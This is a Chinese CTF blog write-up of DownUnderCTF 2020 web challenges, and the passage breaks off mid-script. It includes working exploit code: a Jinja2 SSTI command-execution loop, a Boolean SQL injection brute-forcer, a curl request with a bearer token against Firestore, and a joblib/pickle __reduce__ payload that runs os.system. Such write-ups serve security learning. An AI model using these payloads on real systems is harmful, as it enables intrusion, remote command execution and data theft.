

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="cter, web security, red team">
  <meta name="author" content="slug01sh">
  <meta name="keywords" content="生活,安全,编程,英语">
  <title>2020年9月DownUnderCTF - slug01sh&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":1279647913,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.1.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>小杰的安全小窝</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/ctf/">
                <i class="iconfont icon-user-fill"></i>
                CTF
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/web/">
                <i class="iconfont icon-link-fill"></i>
                Web漏洞挖掘
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/binary/">
                <i class="iconfont icon-link-fill"></i>
                二进制漏洞挖掘
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/apt/">
                <i class="iconfont icon-link-fill"></i>
                APT
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" href="#" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-th-large"></i>
                网站导航
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="/categories/">
                    <i class="iconfont icon-category-fill"></i>
                    分类
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/tags/">
                    <i class="iconfont icon-tags-fill"></i>
                    标签
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/about/">
                    <i class="iconfont icon-user-fill"></i>
                    关于
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/links/">
                    <i class="iconfont icon-link-fill"></i>
                    友链
                  </a>
                
              </div>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://rmt.dogedoge.com/fetch/fluid/storage/bg/dojm2h.png?w=1920&q=100&fmt=webp') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="2020年9月DownUnderCTF">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-09-30 10:05" pubdate>
        2020年9月30日 上午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      35
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2020年9月DownUnderCTF</h1>
            
            <div class="markdown-body">
              <p>官方 writeup 地址：<a target="_blank" rel="noopener" href="https://github.com/DownUnderCTF/Challenges_2020_public">https://github.com/DownUnderCTF/Challenges_2020_public</a><br>题目地址：<a target="_blank" rel="noopener" href="https://play.duc.tf/challenges">https://play.duc.tf/challenges</a></p>
<hr>
<a id="more"></a>

<h1 id="Web-Badmin（DNS配置）"><a href="#Web-Badmin（DNS配置）" class="headerlink" title="Web Badmin（DNS配置）"></a>Web Badmin（DNS配置）</h1><p>题目：web badmin</p>
<p>提示：We launched a game and now it is no longer launched :( can you figure out what happened plox. HALP</p>
<p>视频上方：me rn。windows</p>
<p>注释：<code>&lt;!-- &lt;a href=&quot;https://epicgame.play.duc.tf&quot;&gt;Play our new game here!&lt;/a&gt; --&gt;</code>，注释中的网站无法打开</p>
<p>beep boop：哔哔声</p>
<p>没有cookie</p>
<p>hint：Boss: we are firing you. The game doesn’t even load. Web admin: it was just a simple misconfiguration, i clicked the wrong button 😞</p>
<p>发现注释中有提示信息，使用浏览器、ping工具、curl工具（几种常用的工具）都没有任何响应，束手无策。</p>
<p>最后查看题解才知道，无法连接是由于DNS的原因，使用dig、host即可获得flag。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>host -t txt epicgame.play.duc.tf<br><br>dig epicgame.play.duc.tf TXT         <span class="hljs-comment"># dig 命令主要用来从 DNS 域名服务器查询主机地址信息。</span><br><br></code></pre></td></tr></table></figure>

<p>在 DNS 协议中有很多的资源协议类型，TXT 属于其中一种。</p>
<ul>
<li>A记录 - 保存域的IP地址的记录。</li>
<li>CNAME记录 - 将一个域或子域转发到另一个域，不提供IP地址。</li>
<li>MX记录 - 将邮件定向到电子邮件服务器。</li>
<li>TXT记录 - 允许管理员在记录中存储文本注释。</li>
<li>NS记录 - 存储DNS条目的名称服务器。</li>
<li>SRV记录 - 指定特定服务的端口。</li>
</ul>
<hr>
<h1 id="Robotsss（SSTI）"><a href="#Robotsss（SSTI）" class="headerlink" title="Robotsss（SSTI）"></a>Robotsss（SSTI）</h1><p>题目地址：<a target="_blank" rel="noopener" href="https://chal.duc.tf:30106/">https://chal.duc.tf:30106/</a><br>Us robot devs use better templates than those stupid humans!</p>
<p>注册并登陆系统，可以得到两个提示信息。第一个信息暗示 humans.txt 中有其他信息（<code>dirsearch</code> 工具也可以扫到），第二个提示暗示 flag 位于 /s3cr3t_p4th/robot_fl4g.txt。在第一个提示的源码中有一串二进制码，解码可得 humen.txt（二进制转ascii），第二篇文章的二进制解码得 fl4g.txt。</p>
<p>根据第一个暗示我们找到另一个地址(<a target="_blank" rel="noopener" href="https://chal.duc.tf:30106/4dm1n_Cr3ds)%EF%BC%8C%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80%E7%BB%99%E5%87%BA%E4%B8%80%E6%AE%B5">https://chal.duc.tf:30106/4dm1n_Cr3ds)，这个地址给出一段</a> admin credit 为 6zMLV46JRp6kAmTs3nx5AG4WJgYeY.</p>
<p>访问 humen.txt 地址发现一张图片，使用 <code>strings</code> 工具处理图片（<code>binwalk</code>、<code>foremost</code> 都测试过），得到一串二进制码</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs angelscript"><br><span class="hljs-number">011000010110010001101101011010010110111000111010010101000110100001101001011100110010110101001001011100110010110101010100011010000110010100101101010000010110010001101101011010010110111000101101010100000110000101110011011100110111011101101111011100100110010000101101010110000100010000100001</span><br><br></code></pre></td></tr></table></figure>
<p>解码得到 admin:This-Is-The-Admin-Password-XD!，看上去很像是账号密码。</p>
<p>使用 admin 账号登陆成功。前几天做了很多命令注入的题目（<code>Python</code>、<code>Java</code>），以为这个题目还是命令注入，最后发现是模版注入。并且还在控制台发现：Werkzeug/0.16.0 Python/3.7.9。</p>
<p>测试代码</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;1+1&#125;&#125;                  =&gt; jinja2 <br>&#x27;a&#x27;&#x27;a&#x27;                   =&gt; shell <br>&#x27;a&#x27;.length               =&gt; js <br>len(&#x27;a&#x27;)                 =&gt; python <br>&#x27;a&#x27;.charAt(0)            =&gt; java<br><br>&#123;&#123;1+1&#125;&#125;                  =&gt; 模版注入<br></code></pre></td></tr></table></figure>

<p>最后根据漏洞特性构造 exp。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">from</span> bs4 <span class="hljs-keyword">import</span> BeautifulSoup<br><br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    get_para = <span class="hljs-string">&#x27;a=__class__&amp;&amp;b=__mro__&amp;&amp;c=__getitem__&amp;&amp;d=__subclasses__&amp;&amp;e=__init__&amp;&amp;f=__globals__&#x27;</span><br>    <span class="hljs-comment"># get_para = &#x27;&#x27;</span><br>    <span class="hljs-comment"># post_para = input(&#x27;POST:&#x27;)</span><br>    cmd = input(<span class="hljs-string">&#x27;cmd:&#x27;</span>)<br>    post_para = <span class="hljs-string">&quot;&#123;&#123; &#x27;&#x27;|attr(request.args.a)|attr(request.args.b)|attr(request.args.c)(1)|attr(request.args.d)()|attr(request.args.c)(127)|attr(request.args.e)|attr(request.args.f)|attr(request.args.c)(&#x27;popen&#x27;)(&#x27;&quot;</span> + cmd + <span class="hljs-string">&quot;&#x27;)|attr(&#x27;read&#x27;)() &#125;&#125;&quot;</span><br><br>    base_url = <span class="hljs-string">&#x27;https://chal.duc.tf:30106/admin.php?&#x27;</span> + get_para<br><br>    resp = requests.post(<br>        url=base_url,<br>        data=&#123;<br>            <span class="hljs-string">&#x27;user_in&#x27;</span>: <span class="hljs-string">&#x27;&#x27;</span> + post_para + <span class="hljs-string">&#x27;&#x27;</span><br>        &#125;,<br>        cookies=&#123;<br>            <span class="hljs-string">&#x27;session&#x27;</span>: <span class="hljs-string">&#x27;.eJwlzjsOwjAMANC7eO5gO4kT9zJV4o9gbemEuDtIrG96bzjyjOsB--u8Y4Pj6bDDGNU4F7EnEkntWEiwhok3CfyJUS_ckigxQ1pxr5pNcxrqIp_K4itqFF02zSZLH73ZQPeCGD2YURZiGaJ1tjXWbEO465wFFTa4rzj_GYLPF1GiLjY.X2bocA.l7FpHpE9qJ_HHpRBtjQGgDwGd0Y&#x27;</span>&#125;<br>    )<br><br>    soup = BeautifulSoup(markup=resp.content, features=<span class="hljs-string">&#x27;lxml&#x27;</span>)<br>    print(<span class="hljs-string">f&#x27;result: <span class="hljs-subst">&#123;soup.find(<span class="hljs-string">&quot;p&quot;</span>).get_text()&#125;</span>&#x27;</span>)<br>    print(<span class="hljs-string">&#x27;-------------------------------------------------------&#x27;</span>)<br><br><br></code></pre></td></tr></table></figure>

<p>成功 getshell，并得到 flag<br><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/20200930102222.png" srcset="/img/loading.gif"></p>
<p>官方题解：<a target="_blank" rel="noopener" href="https://github.com/DownUnderCTF/Challenges_2020_public/tree/master/web/robotssss">https://github.com/DownUnderCTF/Challenges_2020_public/tree/master/web/robotssss</a></p>
<p>通过题解可知，6zMLV46JRp6kAmTs3nx5AG4WJgYeY 为 <code>base58</code> 编码，可以通过 <code>&#123;&#123; config.items() &#125;&#125;</code> 查看系统配置信息，配置信息中的函数用于暗示该函数可以使用。还可以使用 Jinja 自带的语法（<code>&#123;&#123; getFile("/fl4g.txt") &#125;&#125;</code>）来读取 flag 文件。</p>
<hr>
<h1 id="Cookie-Clicker（逻辑漏洞）"><a href="#Cookie-Clicker（逻辑漏洞）" class="headerlink" title="Cookie Clicker（逻辑漏洞）"></a>Cookie Clicker（逻辑漏洞）</h1><ul>
<li>题目地址：<a target="_blank" rel="noopener" href="https://cookie-clicker1.web.app/">https://cookie-clicker1.web.app/</a></li>
<li>官方题解：<a target="_blank" rel="noopener" href="https://github.com/DownUnderCTF/Challenges_2020_public/blob/master/web/cookie-clicker/solution.md">https://github.com/DownUnderCTF/Challenges_2020_public/blob/master/web/cookie-clicker/solution.md</a></li>
<li>题解地址：<a target="_blank" rel="noopener" href="https://github.com/joaofcmb/DownUnderCTF-writeups/tree/master/web/cookie-clicker">https://github.com/joaofcmb/DownUnderCTF-writeups/tree/master/web/cookie-clicker</a></li>
</ul>
<p>Click da cookie and you get to increase da cookie. Built this using epic Firebase. Built this in a day HOW COOL is firebase! Didn’t need to worry about security because it’s all handled by Google :) just click cookies and enjoy</p>
<p>WriteUp：我从题目中提取到的关键词是 epic Firebase，Flag 可能和 Firebase 有关。将相关简单流程操作了一下，并未发现异常情况（看了一下请求参数，太复杂了）。题目中还涉及 Google，心生敬畏之心，简单查看源文件之后果断放弃（这种大型网站从来没做过。</p>
<p>查看题解过后发现第一步的思路是正确的，但是没有去搜索 Firebase。Firestore 是一个数据库服务，并且 WriteUp 提到「Firebase 有一个关键的安全问题——设置访问控制，否则任意用户都能访问数据」。</p>
<blockquote>
<p>note：大型服务商（Google）提供的服务通常的问题都出在配置问题。（不然早就修复了</p>
</blockquote>
<p>然后观察题目发送的请求（注意观察存在关键词的请求），第一次请求和后面的请求不相同，通常应该联想到第一次请求是在申请授权。按照 <a target="_blank" rel="noopener" href="https://firebase.google.com/docs/firestore/use-rest-api">Cloud Firestore API</a> 的教程，使用申请授权的信息向 Firebase 进行验证即可得到 flag。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>curl -H <span class="hljs-string">&quot;Authorization:Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IjczNzVhZmY3MGRmZTNjMzNlOTBjYTM2OWUzYTBlZjQxMzE3MmZkODIiLCJ0eXAiOiJKV1QifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vY29va2llLWNsaWNrZXIxIiwiYXVkIjoiY29va2llLWNsaWNrZXIxIiwiYXV0aF90aW1lIjoxNjAwNjE1MDYzLCJ1c2VyX2lkIjoiRXVhUkdDU2t0R040Nnh0MWdBRUgzbEw5MkFyMSIsInN1YiI6IkV1YVJHQ1NrdEdONDZ4dDFnQUVIM2xMOTJBcjEiLCJpYXQiOjE2MDA2MTgzNjYsImV4cCI6MTYwMDYyMTk2NiwiZW1haWwiOiJrZWt3QGtla3cua2VrdyIsImVtYWlsX3ZlcmlmaWVkIjpmYWxzZSwiZmlyZWJhc2UiOnsiaWRlbnRpdGllcyI6eyJlbWFpbCI6WyJrZWt3QGtla3cua2VrdyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.cHgPEFjfZ0J408lkrRfow_3iIsiLYTd1EVIP28NSvj9ZQIKdY6sZtIJ7XPpeVCcxWcswx9tv4Ftv6uNkgF67HeAccyY7I9YwDQuhWrPIAGMNBbQ2qoq19YbpfLy_Ot-0LRE8z9jpPL8uwEDyy8vX_PPPZAmcFHX3nQe1ltvMWDLGVeIUP4F-tDtHX5NGL-UngGPvEAg6qfpzY5tax6NzPwi-HDRDLHLPa4ayiQurwAw2hs0CTOwvbMDjf8YzoNeL0fscukyOPsFZOw-0L0nQbO4FF0GdfZLLski4VvD0XK8N9lkc_Vtn0cqZ1bN3f7Sof28KAvNf5Is-_JnO6fxz1g&quot;</span> <span class="hljs-string">&quot;https://firestore.googleapis.com/v1/projects/cookie-clicker1/databases/(default)/documents/cookies&quot;</span><br><br></code></pre></td></tr></table></figure>
<p>官方的 writeup 则是使用 firestore 在源码中搜索能找到登陆的关键凭证，但后面的步骤就很难联想到。（这个题脑洞是真滴大</p>
<hr>
<h1 id="CicleSpace（SQL注入）"><a href="#CicleSpace（SQL注入）" class="headerlink" title="CicleSpace（SQL注入）"></a>CicleSpace（SQL注入）</h1><ul>
<li>题目链接：<a target="_blank" rel="noopener" href="https://chal.duc.tf:30103/">https://chal.duc.tf:30103/</a></li>
<li>题解链接：<a target="_blank" rel="noopener" href="https://github.com/DownUnderCTF/Challenges_2020_public/blob/master/web/circlespace/writeup.md">https://github.com/DownUnderCTF/Challenges_2020_public/blob/master/web/circlespace/writeup.md</a></li>
</ul>
<p>Oh, how I miss /r/place and /r/circleoftrust. That’s why I decided to create my own one for y’all to play with.<br>/* some bruteforce may be required */</p>
<p>猜测为SQL注入，但是没有成功注入。发送空数据时，返回报错（400）。</p>
<p>查看题解后发现，fuzz SQL注入时，最好把自己写入的参数删掉（参数为空）。参考题解的 payload，添加名为 1 的 Person，然后再分别使用：<code>1&quot; AND 1=0  #</code>，<code>1&quot; AND 1=1  #</code> 进行查询，即可发现为 Boolean 注入，然后使用 Boolean 注入的方法进行爆破即可。（使用 <code>2&quot; # </code> 也能查出来）</p>
<blockquote>
<p>细心一点测试，这个题应该能做（</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> string<br><br>CHARSET = list(string.ascii_lowercase + string.digits) + [<span class="hljs-string">&#x27;\\_&#x27;</span>, <span class="hljs-string">&#x27;-&#x27;</span>, <span class="hljs-string">&#x27;&#123;&#x27;</span>, <span class="hljs-string">&#x27;&#125;&#x27;</span>]<br>CHARSET_CASE_SENSITIVE = list(string.ascii_lowercase + string.ascii_uppercase + string.digits) + [<span class="hljs-string">&#x27;\\_&#x27;</span>, <span class="hljs-string">&#x27;-&#x27;</span>, <span class="hljs-string">&#x27;&#123;&#x27;</span>, <span class="hljs-string">&#x27;&#125;&#x27;</span>]<br><br>BASE_URL = <span class="hljs-string">&quot;http://localhost:5000&quot;</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">query</span>(<span class="hljs-params">url: str, sql: str, result: list, charset=CHARSET, current=<span class="hljs-string">&quot;&quot;</span></span>):</span><br>    found = <span class="hljs-literal">False</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> charset:<br>        r = s.get(url, params=&#123;<span class="hljs-string">&quot;name&quot;</span>: sql.format(current + i + <span class="hljs-string">&quot;%&quot;</span>)&#125;)<br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;is not part&quot;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> r.text:<br>            found = <span class="hljs-literal">True</span><br>            res = query(url, sql, result, charset=charset, current=current + i)<br>            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> res:<br>                result.append(current + i)<br>    <span class="hljs-keyword">return</span> found<br>      <br>s = requests.Session()<br><span class="hljs-comment"># create a circle</span><br>r = s.post(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;BASE_URL&#125;</span>/create&quot;</span>, data=&#123;<span class="hljs-string">&quot;name&quot;</span>: <span class="hljs-string">&quot;lol&quot;</span>&#125;)<br>circle_url = r.url<br><br><span class="hljs-comment"># find the right table</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_tables</span>():</span><br>    q = <span class="hljs-string">&#x27;&quot; AND 1=0 UNION SELECT 1 FROM information_schema.tables WHERE table_type=&quot;BASE TABLE&quot; AND table_schema=&quot;circlespace&quot; AND table_name LIKE &quot;&#123;&#125;&quot; -- a&#x27;</span><br>    tables = []<br>    query(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;circle_url&#125;</span>/people&quot;</span>, q, tables)<br>    <span class="hljs-keyword">return</span> tables<br><br>print(get_tables())<br><br></code></pre></td></tr></table></figure>


<hr>
<h1 id="Taking-Stock（Python序列化）"><a href="#Taking-Stock（Python序列化）" class="headerlink" title="Taking Stock（Python序列化）"></a>Taking Stock（Python序列化）</h1><p>题目地址：<a target="_blank" rel="noopener" href="https://chal.duc.tf:30104/">https://chal.duc.tf:30104/</a></p>
<p>After taking one unit of AI at uni I’m now a pro. My linear regression model is amazing at predicting the stock market. I’m so proud of it I’m even offering it as a service. Can’t wait to get that VC money!</p>
<p>题解链接：<a target="_blank" rel="noopener" href="https://github.com/DownUnderCTF/Challenges_2020_public/tree/master/web/taking-stock">https://github.com/DownUnderCTF/Challenges_2020_public/tree/master/web/taking-stock</a></p>
<p>登陆后可以发现，Profile Picture 泄漏了 uuid。解码 session 后获得 <code>&#123;&quot;id&quot;:&quot;74795b25-010e-4fca-9e7b-ae05a000d089&quot;,&quot;username&quot;:&quot;1&quot;&#125;_q?G??&#39;1v8aF??j?????&gt;p?4</code>。和图片的 uuid（<code>&lt;img src=&quot;/profile-picture/74795b25-010e-4fca-9e7b-ae05a000d089&quot; alt=&quot;Profile Picture&quot;&gt;</code>） 相同。</p>
<p>在 stock 位置有目录穿越，也就意味着 joblib 反序列时，可以指定为自己上传的文件。</p>
<p>基本思路：构建 payload（命令执行结果写回文件） -&gt; 命令序列化后存入文件 -&gt; 将文件做为头像传入系统 -&gt; 在 stock 处反序列化上传的文件 -&gt; 读取头像。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-keyword">import</span> json<br><span class="hljs-keyword">import</span> base64 <span class="hljs-keyword">as</span> b64<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> joblib<br><span class="hljs-keyword">import</span> io<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">base64Padding</span>(<span class="hljs-params">data</span>):</span><br>    missing_padding = <span class="hljs-number">4</span> - len(data) % <span class="hljs-number">4</span><br>    <span class="hljs-keyword">if</span> missing_padding:<br>        data += <span class="hljs-string">&#x27;=&#x27;</span> * missing_padding<br>    <span class="hljs-keyword">return</span> data<br><br>REMOTE = <span class="hljs-string">&#x27;https://chal.duc.tf:30104/&#x27;</span><br>session = requests.Session()<br><br><span class="hljs-comment"># 1. 登陆</span><br>resp = session.post(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;REMOTE&#125;</span>/login&#x27;</span>, data=&#123;<br>    <span class="hljs-string">&#x27;username&#x27;</span>: <span class="hljs-string">&#x27;hacker&#x27;</span><br>&#125;)<br><br><span class="hljs-comment"># 2。 获取 Cookie</span><br>token = json.loads(<br>    b64.b64decode(base64Padding(session.cookies[<span class="hljs-string">&#x27;session&#x27;</span>].split(<span class="hljs-string">&#x27;.&#x27;</span>)[<span class="hljs-number">0</span>])).decode()<br>)<br>uid = token[<span class="hljs-string">&#x27;id&#x27;</span>]<br><br>resp = session.get(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;REMOTE&#125;</span>/profile-picture/<span class="hljs-subst">&#123;uid&#125;</span>&#x27;</span>)<br><br>remote_path = resp.text.split(<span class="hljs-string">&#x27; &#x27;</span>)[<span class="hljs-number">-1</span>].replace(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;uid&#125;</span>.png&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>).rstrip(<span class="hljs-string">&#x27;/&#x27;</span>)<br><span class="hljs-comment"># print(remote_path)</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">make_payload</span>(<span class="hljs-params">cmd</span>):</span><br>    payload = <span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;cmd&#125;</span> &gt; <span class="hljs-subst">&#123;remote_path&#125;</span>/<span class="hljs-subst">&#123;uid&#125;</span>.png&#x27;</span><br>    <span class="hljs-comment"># print(payload)</span><br><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Model</span>:</span><br>        <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span>(<span class="hljs-params">self</span>):</span><br>            <span class="hljs-keyword">return</span> (os.system, (payload,))<br><br>    <span 